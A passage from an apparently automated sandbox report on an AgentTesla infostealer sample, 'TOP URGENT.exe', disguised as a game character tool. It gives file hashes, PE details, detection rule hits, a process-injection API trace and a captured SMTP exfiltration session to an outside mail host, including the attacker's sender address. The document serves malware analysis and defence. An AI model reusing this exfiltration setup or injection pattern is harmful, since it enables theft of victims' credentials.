                                                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                                        C:\Windows\System32\drivers\etc\hosts
                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:modified
                                                                                        Size (bytes):11
                                                                                        Entropy (8bit):2.663532754804255
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:iLE:iLE
                                                                                        MD5:B24D295C1F84ECBFB566103374FB91C5
                                                                                        SHA1:6A750D3F8B45C240637332071D34B403FA1FF55A
                                                                                        SHA-256:4DC7B65075FBC5B5421551F0CB814CAFDC8CACA5957D393C222EE388B6F405F4
                                                                                        SHA-512:9BE279BFA70A859608B50EF5D30BF2345F334E5F433C410EA6A188DCAB395BFF50C95B165177E59A29261464871C11F903A9ECE55B2D900FE49A9F3C49EB88FA
                                                                                        Malicious:true
                                                                                        Reputation:high, very likely benign file
                                                                                        Preview: ..127.0.0.1

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Entropy (8bit):7.470825518995194
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                        File name:TOP URGENT.exe
                                                                                        File size:713216
                                                                                        MD5:3af20ee616d2d9c806d27a3c245d4d7b
                                                                                        SHA1:f4448544d0fd560be3a8c1e6ff46670251785267
                                                                                        SHA256:c810e257ac876cb505d076efee941037f5f9fd11464a4af8515d0fbac61509b1
                                                                                        SHA512:b1e98284ddc4e4ffb2742818e4a38c172d255a6922bd058b29f0fa0071c4564268e7faa967b6de4dc8713f322bf904afb801f58eee17d9d1e240f18f12b920ba
                                                                                        SSDEEP:12288:i7kWHCM2K4CKI/yzQs2TaIpI0iJWRUB1acpCAIWoAdLekQNED0aoV5I:CE3CfMIpI0iJyUBnuW/vcEoaoV5I
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X.Aa..............0..r...n........... ........@.. .......................@............@................................

                                                                                        File Icon

                                                                                        Icon Hash:f1f0f4d0eecccc71

                                                                                        Static PE Info

                                                                                        General

                                                                                        Entrypoint:0x4a90e2
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                        Time Stamp:0x6141B258 [Wed Sep 15 08:44:08 2021 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:v4.0.30319
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                        Entrypoint Preview

                                                                                        Instruction
                                                                                        jmp dword ptr [00402000h]
                                                                                        add byte ptr [eax], al

                                                                                        Data Directories

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa9090 | 0x4f | .text |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xaa000 | 0x6b90 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb2000 | 0xc | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

                                                                                        Sections

| Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|
| .text | 0x2000 | 0xa70e8 | 0xa7200 | False | 0.825526189697 | data | 7.54096955911 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
| .rsrc | 0xaa000 | 0x6b90 | 0x6c00 | False | 0.442672164352 | data | 5.09315736514 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0xb2000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

                                                                                        Resources

| Name | RVA | Size | Type | Language | Country |
|---|---|---|---|---|---|
| RT_ICON | 0xaa200 | 0x668 | data | | |
| RT_ICON | 0xaa878 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 1953594267, next used block 28725 | | |
| RT_ICON | 0xaab70 | 0x128 | GLS_BINARY_LSB_FIRST | | |
| RT_ICON | 0xaaca8 | 0xea8 | data | | |
| RT_ICON | 0xabb60 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | | |
| RT_ICON | 0xac418 | 0x568 | GLS_BINARY_LSB_FIRST | | |
| RT_ICON | 0xac990 | 0x25a8 | data | | |
| RT_ICON | 0xaef48 | 0x10a8 | data | | |
| RT_ICON | 0xb0000 | 0x468 | GLS_BINARY_LSB_FIRST | | |
| RT_GROUP_ICON | 0xb0478 | 0x84 | data | | |
| RT_VERSION | 0xb050c | 0x484 | data | | |
| RT_MANIFEST | 0xb09a0 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | | |

                                                                                        Imports

| DLL | Import |
|---|---|
| mscoree.dll | _CorExeMain |

                                                                                        Version Infos

| Description | Data |
|---|---|
| Translation | 0x0000 0x04b0 |
| LegalCopyright | Copyright 2008 - 2010 |
| Assembly Version | 1.3.0.0 |
| InternalName | RuntimeFeatu.exe |
| FileVersion | 1.3.0.0 |
| CompanyName | WHC |
| LegalTrademarks | |
| Comments | A little Tool where you can check the stats of your RYL - Risk Your Life - characters. Ruins of War version. |
| ProductName | RYL Character Tool - RoW EU version |
| ProductVersion | 1.3.0.0 |
| FileDescription | RYL Character Tool - RoW EU version |
| OriginalFilename | RuntimeFeatu.exe |

                                                                                        Network Behavior

                                                                                        Snort IDS Alerts

| Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|---|---|---|
| 09/15/21-16:23:28.117425 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49820 | 587 | 192.168.2.3 | 208.91.199.225 |

                                                                                        Network Port Distribution

                                                                                        TCP Packets


                                                                                        UDP Packets


                                                                                        DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Sep 15, 2021 16:23:26.026834011 CEST | 192.168.2.3 | 8.8.8.8 | 0x5147 | Standard query (0) | smtp.almuntakhaba.com | A (IP address) | IN (0x0001)
Sep 15, 2021 16:23:26.557805061 CEST | 192.168.2.3 | 8.8.8.8 | 0xd737 | Standard query (0) | smtp.almuntakhaba.com | A (IP address) | IN (0x0001)

                                                                                        DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Sep 15, 2021 16:23:26.192635059 CEST | 8.8.8.8 | 192.168.2.3 | 0x5147 | No error (0) | smtp.almuntakhaba.com | us2.smtp.mailhostbox.com |  | CNAME (Canonical name) | IN (0x0001)
Sep 15, 2021 16:23:26.192635059 CEST | 8.8.8.8 | 192.168.2.3 | 0x5147 | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.199.225 | A (IP address) | IN (0x0001)
Sep 15, 2021 16:23:26.192635059 CEST | 8.8.8.8 | 192.168.2.3 | 0x5147 | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.198.143 | A (IP address) | IN (0x0001)
Sep 15, 2021 16:23:26.192635059 CEST | 8.8.8.8 | 192.168.2.3 | 0x5147 | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.199.223 | A (IP address) | IN (0x0001)
Sep 15, 2021 16:23:26.192635059 CEST | 8.8.8.8 | 192.168.2.3 | 0x5147 | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.199.224 | A (IP address) | IN (0x0001)
Sep 15, 2021 16:23:26.717607021 CEST | 8.8.8.8 | 192.168.2.3 | 0xd737 | No error (0) | smtp.almuntakhaba.com | us2.smtp.mailhostbox.com |  | CNAME (Canonical name) | IN (0x0001)
Sep 15, 2021 16:23:26.717607021 CEST | 8.8.8.8 | 192.168.2.3 | 0xd737 | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.199.225 | A (IP address) | IN (0x0001)
Sep 15, 2021 16:23:26.717607021 CEST | 8.8.8.8 | 192.168.2.3 | 0xd737 | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.199.224 | A (IP address) | IN (0x0001)
Sep 15, 2021 16:23:26.717607021 CEST | 8.8.8.8 | 192.168.2.3 | 0xd737 | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.199.223 | A (IP address) | IN (0x0001)
Sep 15, 2021 16:23:26.717607021 CEST | 8.8.8.8 | 192.168.2.3 | 0xd737 | No error (0) | us2.smtp.mailhostbox.com |  | 208.91.198.143 | A (IP address) | IN (0x0001)

                                                                                        SMTP Packets

| Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands |
|---|---|---|---|---|---|
| Sep 15, 2021 16:23:27.243478060 CEST | 587 | 49820 | 208.91.199.225 | 192.168.2.3 | 220 us2.outbound.mailhostbox.com ESMTP Postfix |
| Sep 15, 2021 16:23:27.244544983 CEST | 49820 | 587 | 192.168.2.3 | 208.91.199.225 | EHLO 928100 |
| Sep 15, 2021 16:23:27.388012886 CEST | 587 | 49820 | 208.91.199.225 | 192.168.2.3 | 250-us2.outbound.mailhostbox.com |
| | | | | | 250-PIPELINING |
| | | | | | 250-SIZE 41648128 |
| | | | | | 250-VRFY |
| | | | | | 250-ETRN |
| | | | | | 250-STARTTLS |
| | | | | | 250-AUTH PLAIN LOGIN |
| | | | | | 250-AUTH=PLAIN LOGIN |
| | | | | | 250-ENHANCEDSTATUSCODES |
| | | | | | 250-8BITMIME |
| | | | | | 250 DSN |
| Sep 15, 2021 16:23:27.389497042 CEST | 49820 | 587 | 192.168.2.3 | 208.91.199.225 | AUTH login cHBjQGFsbXVudGFraGFiYS5jb20= |
| Sep 15, 2021 16:23:27.533042908 CEST | 587 | 49820 | 208.91.199.225 | 192.168.2.3 | 334 UGFzc3dvcmQ6 |
| Sep 15, 2021 16:23:27.678124905 CEST | 587 | 49820 | 208.91.199.225 | 192.168.2.3 | 235 2.7.0 Authentication successful |
| Sep 15, 2021 16:23:27.679183006 CEST | 49820 | 587 | 192.168.2.3 | 208.91.199.225 | MAIL FROM:<ppc@almuntakhaba.com> |
| Sep 15, 2021 16:23:27.822444916 CEST | 587 | 49820 | 208.91.199.225 | 192.168.2.3 | 250 2.1.0 Ok |
| Sep 15, 2021 16:23:27.822858095 CEST | 49820 | 587 | 192.168.2.3 | 208.91.199.225 | RCPT TO:<ppc@almuntakhaba.com> |
| Sep 15, 2021 16:23:27.972619057 CEST | 587 | 49820 | 208.91.199.225 | 192.168.2.3 | 250 2.1.5 Ok |
| Sep 15, 2021 16:23:27.973043919 CEST | 49820 | 587 | 192.168.2.3 | 208.91.199.225 | DATA |
| Sep 15, 2021 16:23:28.116139889 CEST | 587 | 49820 | 208.91.199.225 | 192.168.2.3 | 354 End data with <CR><LF>.<CR><LF> |
| Sep 15, 2021 16:23:28.118664980 CEST | 49820 | 587 | 192.168.2.3 | 208.91.199.225 | . |
| Sep 15, 2021 16:23:28.321346998 CEST | 587 | 49820 | 208.91.199.225 | 192.168.2.3 | 250 2.0.0 Ok: queued as DBF7FD96D1 |

                                                                                        System Behavior

General

Start time: 16:21:25
Start date: 15/09/2021
Path: C:\Users\user\Desktop\TOP URGENT.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\TOP URGENT.exe'
Imagebase: 0x9f0000
File size: 713216 bytes
MD5 hash: 3AF20EE616D2D9C806D27A3C245D4D7B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.244947880.0000000002D91000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.245468332.0000000003D89000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.245468332.0000000003D89000.00000004.00000001.sdmp, Author: Joe Security
Reputation: low

General

Start time: 16:21:35
Start date: 15/09/2021
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase: 0x690000
File size: 261728 bytes
MD5 hash: D621FD77BD585874F9686D3A76462EF1
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.501627918.0000000002981000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.501627918.0000000002981000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.493480561.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000004.00000002.493480561.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
Reputation: high

                                                                                        Disassembly

                                                                                        Code Analysis

                                                                                          Executed Functions

                                                                                          APIs
                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 08C7F266
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false

                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0159968E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244633219.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false

                                                                                          APIs
                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0159FEAA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244633219.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false

                                                                                          APIs
                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0159FEAA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244633219.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false

                                                                                          APIs
                                                                                          • CreateActCtxA.KERNEL32(?), ref: 01595421
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244633219.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: Create
                                                                                          • String ID:
                                                                                          • API String ID: 2289755597-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • CreateActCtxA.KERNEL32(?), ref: 01595421
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244633219.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: Create
                                                                                          • String ID:
                                                                                          • API String ID: 2289755597-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08C7EA38
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3559483778-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0159B91E,?,?,?,?,?), ref: 0159BDE7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244633219.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DuplicateHandle
                                                                                          • String ID:
                                                                                          • API String ID: 3793708945-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0159B91E,?,?,?,?,?), ref: 0159BDE7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244633219.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DuplicateHandle
                                                                                          • String ID:
                                                                                          • API String ID: 3793708945-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0159B91E,?,?,?,?,?), ref: 0159BDE7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244633219.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DuplicateHandle
                                                                                          • String ID:
                                                                                          • API String ID: 3793708945-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08C7EB18
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessRead
                                                                                          • String ID:
                                                                                          • API String ID: 1726664587-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • SetThreadContext.KERNELBASE(?,00000000), ref: 08C7E88E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: ContextThread
                                                                                          • String ID:
                                                                                          • API String ID: 1591575202-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01599709,00000800,00000000,00000000), ref: 0159991A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244633219.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad
                                                                                          • String ID:
                                                                                          • API String ID: 1029625771-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08C7E956
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,01599709,00000800,00000000,00000000), ref: 0159991A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244633219.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad
                                                                                          • String ID:
                                                                                          • API String ID: 1029625771-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: ResumeThread
                                                                                          • String ID:
                                                                                          • API String ID: 947044025-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • PostMessageW.USER32(?,?,?,?), ref: 04D81F05
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.246421106.0000000004D80000.00000040.00000001.sdmp, Offset: 04D80000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: MessagePost
                                                                                          • String ID:
                                                                                          • API String ID: 410705778-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0159968E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244633219.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: HandleModule
                                                                                          • String ID:
                                                                                          • API String ID: 4139908857-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          APIs
                                                                                          • PostMessageW.USER32(?,?,?,?), ref: 04D81F05
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.246421106.0000000004D80000.00000040.00000001.sdmp, Offset: 04D80000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: MessagePost
                                                                                          • String ID:
                                                                                          • API String ID: 410705778-0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244219349.0000000000F7D000.00000040.00000001.sdmp, Offset: 00F7D000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244239927.0000000000F8D000.00000040.00000001.sdmp, Offset: 00F8D000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244239927.0000000000F8D000.00000040.00000001.sdmp, Offset: 00F8D000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244239927.0000000000F8D000.00000040.00000001.sdmp, Offset: 00F8D000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244219349.0000000000F7D000.00000040.00000001.sdmp, Offset: 00F7D000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244239927.0000000000F8D000.00000040.00000001.sdmp, Offset: 00F8D000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244219349.0000000000F7D000.00000040.00000001.sdmp, Offset: 00F7D000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244219349.0000000000F7D000.00000040.00000001.sdmp, Offset: 00F7D000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Non-executed Functions

                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.243754824.00000000009F2000.00000002.00020000.sdmp, Offset: 009F0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.243742220.00000000009F0000.00000002.00020000.sdmp
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: B8>w
                                                                                          • API String ID: 0-3045393504
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: B8>w
                                                                                          • API String ID: 0-3045393504
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: -xaM
                                                                                          • API String ID: 0-1568011996
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: -xaM
                                                                                          • API String ID: 0-1568011996
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: MW0
                                                                                          • API String ID: 0-3214648272
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: MW0
                                                                                          • API String ID: 0-3214648272
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: p,U
                                                                                          • API String ID: 0-3030774698
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Strings
                                                                                          Memory Dump Source
